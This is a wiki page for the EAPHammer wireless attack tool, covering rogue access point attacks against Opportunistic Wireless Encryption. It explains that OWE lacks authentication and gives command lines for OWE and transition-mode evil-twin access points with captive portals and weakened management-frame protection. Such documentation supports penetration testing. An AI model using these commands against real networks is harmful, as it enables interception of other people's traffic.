XV. Attacking Opportunistic Wireless Encryption

Special thanks to Steve Darracott for his help researching this subject: @thedarracott

EAPHammer supports attacks against networks and clients that are configured to use Opportunistic Wireless Encryption (OWE), which is also known as "Enhanced Open". For a theoretical overview of this subject, please refer to the following blog posts:

td;dr - OWE is used to provide encryption capabilities to public wireless networks. You can think of OWE like this - OWE is to open networks as HTTPS is to HTTP. However, unlike HTTPS, OWE does not provide any means of authenticating the identity of what you're connecting to (HTTPS uses server certs). This means that it can be compromised using Person-In-the-Middle (PITM) attacks. From an operational standpoint, this means that you can execute rogue AP attacks against OWE in the same way you would against open networks.

To create a rogue access point that uses OWE, just pass the --auth owe flag as shown in the following example:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal

Note that by default, eaphammer will conform to RFC 8110 by requiring stations to use Protected Management Frames (PMF) when --auth owe is used. You are free to tell eaphammer to violate RFC 8110 by making PMF enabled but not required:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf enable

Should you wish to commit an even more egregious RFC violation, you can disable PMF completely as well:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf disable

OWE Transition Mode

EAPHammer also supports attacks against OWE Transition Mode. To create a rogue AP that uses OWE Transition Mode, use the --auth owe-transition as shown in the following example:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal

By default, eaphammer will conform to RFC 8110 by enabling but not requiring PMF when --auth owe-transition is used. You are free to tell eaphammer to violate RFC 8110 by making PMF required:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf require

Alternatively, you can disable PMF completely:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf disable

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XV. Attacking Opportunistic Wireless Encryption

OWE Transition Mode

EAPHammer Wiki

Home

Setup Guide

I. Kali Setup Instructions

II. Parrot OS (Security)

III. Ubuntu

IV. Other Distros

Usage Guide

I. x.509 Certificate Generation

II. Stealing RADIUS Credentials Using EAPHammer

III. Stealing AD Credentials Using Hostile Portal Attacks

IV. Indirect Wireless Pivots

V. Performing Captive Portal Attacks

VI. Attacking 802.11n Networks

VII. Hardware Modes

VIII. Attacking WPA EAP and WPA2 EAP Networks

IX. EAPHammer User Database

X. ESSID Cloaking

XI. Using Karma

XII. PMKID Attacks Against WPA PSK and WPA2 PSK Networks

XIII. Password Spraying

XIV. Cert Wizard

XV. Attacking Opportunistic Wireless Encryption

XVI. Protected Management Frames

XVII. ESSID Stripping Attacks

XVIII. Advanced Granular Controls

Acknowledgements

Clone this wiki locally